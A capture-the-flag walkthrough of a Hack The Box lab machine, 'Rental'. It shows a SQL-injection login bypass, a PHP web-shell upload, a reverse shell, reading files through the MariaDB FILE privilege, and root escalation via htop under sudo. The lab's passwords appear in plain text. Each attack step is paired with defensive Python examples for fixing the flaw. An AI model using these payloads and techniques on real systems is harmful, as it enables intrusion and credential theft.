Information Gathering

Port Scanning

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# nmap -sC -sV $(cat ip.txt)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 19:58 AEST
Nmap scan report for 10.129.96.12
Host is up (0.010s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Mixt
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds

Directory Scanning

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# dirsearch -u "http://10.129.96.12" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 220545

Output File: /home/h4m5t/Desktop/HTB/Rental/reports/http_10.129.96.12/_24-09-30_00-19-30.txt

Target: http://10.129.96.12/

[00:19:30] Starting:
[00:19:31] 301 - 312B - /admin -> http://10.129.96.12/admin/
[00:19:31] 301 - 313B - /assets -> http://10.129.96.12/assets/
[00:19:31] 301 - 310B - /css -> http://10.129.96.12/css/
[00:19:31] 301 - 315B - /database -> http://10.129.96.12/database/
[00:19:32] 301 - 309B - /js -> http://10.129.96.12/js/

SQL Injection and File Upload

Based on the directory brute-force results, open the login page http://10.129.96.12/admin/login.php; it turns out to have a SQL injection vulnerability.

Logging in with a “universal password” (an authentication-bypass payload) is enough.

payload = {"username":"' OR 1=1 limit 1#","password":"123456"} 
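Why that “universal password” works, and what closes the hole, as an added Python example (not code from this writeup or from the rental application): the vulnerable login splices the username into the SQL text, the safe one binds parameters. SQLite from the standard library stands in for MariaDB, so the payload's MySQL `#` comment is written as SQLite's `-- ` comment; the users table and its credentials are constructed for the demo.

```python
import sqlite3

# Constructed demo table with one admin row. The password is kept in clear only to
# keep the demo short; a real application stores a hash (PHP: password_hash/verify).
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Login the way a concatenating login.php does it: user input becomes part of
    the SQL text, so the input can change what the query means."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Same query as a parameterised statement: values travel separately from the
    SQL text, so quotes and comment markers in the input are data, never syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# The writeup's payload ends in MySQL's '#' comment; SQLite spells the same thing
# '-- ' (assumption made so the demo runs on the standard library alone).
BYPASS_USERNAME = "' OR 1=1 LIMIT 1 -- "

def demo():
    conn = make_demo_db()
    return {
        "vulnerable_bypass": login_vulnerable(conn, BYPASS_USERNAME, "123456"),  # 'admin'
        "safe_bypass": login_safe(conn, BYPASS_USERNAME, "123456"),              # None
        "safe_real_login": login_safe(conn, "admin", "S3cret!"),                  # 'admin'
    }

if __name__ == "__main__":
    print(demo())
```

In the vulnerable version the effective query becomes `... WHERE username = '' OR 1=1 LIMIT 1` and the rest is commented out, which returns the first row (admin) regardless of password. With bound parameters the same string is compared literally against the username column and matches nothing.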

Opening an image from the home page in a new tab reveals the directory where uploaded images are stored: http://10.129.96.12/admin/assets/uploads/cars_img/

After logging in, the upload point is in the Cars section of the left-hand menu. The system does no file filtering, so a small web shell uploads without trouble and gives command execution.

http://10.129.96.12/admin/assets/uploads/cars_img/1727608560_phpshell.php?cmd=id

Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Then upload a full-featured web shell and use nc as a listener to catch a reverse shell.
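The upload handler had no filtering at all, which is what let a .php file land in a web-served directory. An added Python example (not code from this writeup or from the rental application) of the checks a gallery upload should make: an extension allow-list, magic-byte verification of the content, rejection of executable extensions anywhere in the name, and a server-chosen random filename. The sample files are constructed byte strings, and the extension and magic tables are the author's assumptions for an image-only upload.

```python
import os
import re
import secrets

# Extension -> accepted leading bytes (magic numbers) for the image types a car
# gallery needs. Anything not listed here is refused outright.
ALLOWED_IMAGES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a PHP/Apache host may execute or that carry active content. Rejected
# wherever they occur in the name, because Apache's mod_mime can honour more than
# one extension ("shell.php.jpg").
EXECUTABLE_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar",
                   ".phps", ".html", ".htm", ".js", ".svg", ".htaccess"}
MAX_BYTES = 5 * 1024 * 1024

def validate_image_upload(client_filename, data, max_bytes=MAX_BYTES):
    """Return (accepted, reason). Only the client's name and the raw bytes are
    looked at; the client-supplied Content-Type is ignored on purpose."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    if not data or len(data) > max_bytes:
        return False, "empty or oversized file"
    suffixes = [s.lower() for s in re.findall(r"\.[A-Za-z0-9]+", base)]
    if not suffixes:
        return False, "no file extension"
    if any(s in EXECUTABLE_EXTS for s in suffixes):
        return False, "executable extension in name"
    ext = suffixes[-1]
    if ext not in ALLOWED_IMAGES:
        return False, "extension not in allow-list"
    if not any(data.startswith(magic) for magic in ALLOWED_IMAGES[ext]):
        return False, "content does not match the extension's magic bytes"
    if b"<?php" in data or b"<?=" in data:
        return False, "PHP open tag inside image data"  # cheap polyglot check
    return True, "ok"

def storage_name(client_filename):
    """Server-chosen name: random token plus the (lower-cased) extension. The
    client's name never reaches the filesystem, so nothing to guess or traverse."""
    ext = re.findall(r"\.[A-Za-z0-9]+", os.path.basename(client_filename))[-1].lower()
    return secrets.token_hex(16) + ext

# Constructed samples (not real files): minimal headers are enough for the checks.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 64
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
PHP_SAMPLE = b"<?php echo 1; ?>"

def demo():
    cases = [
        ("1727608560_phpshell.php", PHP_SAMPLE),  # the kind of name the writeup uploaded
        ("car.php.jpg", JPEG_SAMPLE),             # double extension
        ("car.jpg", PHP_SAMPLE),                  # right name, wrong content
        ("car.jpg", JPEG_SAMPLE),                 # legitimate upload
    ]
    return [(name, validate_image_upload(name, data)) for name, data in cases]

if __name__ == "__main__":
    for name, verdict in demo():
        print(name, verdict)
```

Validation is the second line of defence; the first is that the upload directory must not be able to execute anything (store it outside the document root, or serve it with PHP handlers disabled), so that even a file that slips through is only ever returned as bytes.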


Stabilizing the Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo;fg
export TERM=xterm

Lateral Movement

The database credentials are found in the file db_connect.php.

www-data@rental:/var/www/html/admin$ cat db_connect.php 
<?php

$conn= new mysqli('localhost','manager','password#1','car_rental_db')or die("Could not connect to mysql".mysqli_error($con));

Log in to the database and check the user's privileges.

www-data@rental:/var/www/html/admin$ mysql -u manager -p'password#1' car_rental_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 217
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [car_rental_db]> SHOW GRANTS FOR 'manager'@'localhost';
+---------------------------------------------------------------------------------------------------------------+
| Grants for manager@localhost |
+---------------------------------------------------------------------------------------------------------------+
| GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '*A778F55EAE542DA23ED0F6351B01262EFFD3BBB0' |
| GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost` |
+---------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)

MariaDB [car_rental_db]>

Using the FILE privilege, read user manager's command history, which reveals the password lastr3s0rt.

MariaDB [car_rental_db]> SELECT LOAD_FILE('/home/manager/.bash_history');
+-----------------------------------------------------------+
| LOAD_FILE('/home/manager/.bash_history') |
+-----------------------------------------------------------+
| echo -e "Welcome1\nlastr3s0rt\nlastr3s0rt" | passwd
exit
|
+-----------------------------------------------------------+
1 row in set (0.000 sec)
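The global FILE grant is what turned a web-app database account into a file reader on the host. An added Python example (not code from this writeup or from the target) that audits `SHOW GRANTS` output for privileges held on `*.*` that reach outside the database, and writes the matching REVOKE statement. The sample lines are constructed from the grants shown above, with the password hash omitted; the list of privileges treated as risky is the author's assumption.

```python
import re

# One GRANT line as printed by the mysql/mariadb client; table borders are tolerated.
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<who>\S+)", re.IGNORECASE)

# Privileges that, held globally (ON *.*), let a database account reach outside the
# database: FILE reads/writes server-side files (what the writeup used), SUPER and
# PROCESS expose other sessions and server state, ALL PRIVILEGES implies everything.
RISKY_GLOBAL = {"FILE", "SUPER", "PROCESS", "SHUTDOWN", "ALL PRIVILEGES", "GRANT OPTION"}

def parse_grant(line):
    """Return {'privs': set, 'scope': str, 'who': str} or None for non-GRANT lines."""
    line = line.strip().strip("|").strip()
    m = GRANT_RE.match(line)
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return {"privs": privs, "scope": m.group("scope"), "who": m.group("who")}

def audit_grants(lines):
    """List accounts holding any RISKY_GLOBAL privilege at global scope."""
    findings = []
    for line in lines:
        g = parse_grant(line)
        if g and g["scope"] == "*.*":
            hits = sorted(g["privs"] & RISKY_GLOBAL)
            if hits:
                findings.append({"who": g["who"], "privs": hits})
    return findings

def revoke_statement(finding):
    """MariaDB/MySQL REVOKE for one finding (ALL PRIVILEGES uses its own form)."""
    if "ALL PRIVILEGES" in finding["privs"]:
        return "REVOKE ALL PRIVILEGES, GRANT OPTION FROM %s;" % finding["who"]
    return "REVOKE %s ON *.* FROM %s;" % (", ".join(finding["privs"]), finding["who"])

# Constructed sample: the grants the writeup found for `manager`, plus a benign account.
SAMPLE_GRANTS = [
    "| GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '<hash omitted>' |",
    "| GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost` |",
    "| GRANT USAGE ON *.* TO `app`@`localhost` |",
]

if __name__ == "__main__":
    for f in audit_grants(SAMPLE_GRANTS):
        print(f["who"], "holds", f["privs"], "globally ->", revoke_statement(f))
```

An application account needs rights on its own schema only; the ALL PRIVILEGES grant on `car_rental_db`.* is not flagged, the FILE grant on `*.*` is. Beyond revoking, setting the server's `secure_file_priv` to a dedicated directory (or leaving it empty to disable file access) limits what LOAD_FILE and INTO OUTFILE can touch even if such a grant reappears.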

Switch user with su manager and grab user_flag.

Privilege Escalation

The sudo -l command lists the commands the current user may run with sudo and the associated permissions.

manager@rental:~$ sudo -l
[sudo] password for manager:
Matching Defaults entries for manager on rental:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User manager may run the following commands on rental:
(ALL) /usr/bin/htop

Run htop

sudo /usr/bin/htop

Select the csvexport.sh process and press e to view its environment variables; the root password 3F^bv=3DVpuCKTL4 is sitting there.

root_flag obtained!
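The root password was lost because a script running as root carried it in its environment, where any process viewer running with enough privilege (here, htop under sudo) can read it. An added Python example (not code from this writeup or from the target) that parses the /proc/<pid>/environ format and reports variable names that look like credentials, so an administrator can find such leaks before someone else does. Only names are reported, never values. The sample environment block and its placeholder values are constructed; the name pattern is the author's assumption.

```python
import os
import re

# Variable names that usually carry credentials. Only the NAMES are reported, never
# the values: the audit must not become a second way of leaking them.
SECRET_NAME_RE = re.compile(
    r"(PASS(WORD|WD)?|SECRET|TOKEN|API[_-]?KEY|PRIVATE[_-]?KEY)", re.IGNORECASE)

def parse_environ(raw):
    """Parse the /proc/<pid>/environ format: NUL-separated KEY=VALUE entries."""
    env = {}
    for entry in raw.split(b"\x00"):
        if not entry or b"=" not in entry:
            continue
        key, _, value = entry.partition(b"=")
        env[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env

def secret_vars(raw):
    """Sorted names of variables in one environ block that look like secrets."""
    return sorted(k for k in parse_environ(raw) if SECRET_NAME_RE.search(k))

def scan_proc(proc_root="/proc"):
    """Walk every readable /proc/<pid>/environ (root is needed to see other users'
    processes) and return (pid, command name, offending variable names) tuples."""
    findings = []
    if not os.path.isdir(proc_root):
        return findings
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, pid, "environ"), "rb") as fh:
                raw = fh.read()
            with open(os.path.join(proc_root, pid, "comm")) as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # process exited, or not ours to read
        names = secret_vars(raw)
        if names:
            findings.append((int(pid), comm, names))
    return findings

# Constructed sample of what a cron-launched export script's environ might hold
# (values are placeholders, not anything from the box).
SAMPLE_ENVIRON = (b"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin\x00"
                  b"HOME=/root\x00"
                  b"DB_PASSWORD=<placeholder>\x00"
                  b"EXPORT_TOKEN=<placeholder>\x00"
                  b"LANG=C.UTF-8\x00")

if __name__ == "__main__":
    print("sample block leaks:", secret_vars(SAMPLE_ENVIRON))
    for pid, comm, names in scan_proc():
        print(pid, comm, names)
```

Two fixes follow from the finding. The script should read its credentials from a root-only file (mode 0600) rather than receive them as environment variables, and sudo should not hand out interactive tools like htop at all: a program that can read other processes' state, and spawn commands, is root by another name, so the sudoers entry should name a specific non-interactive command instead.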
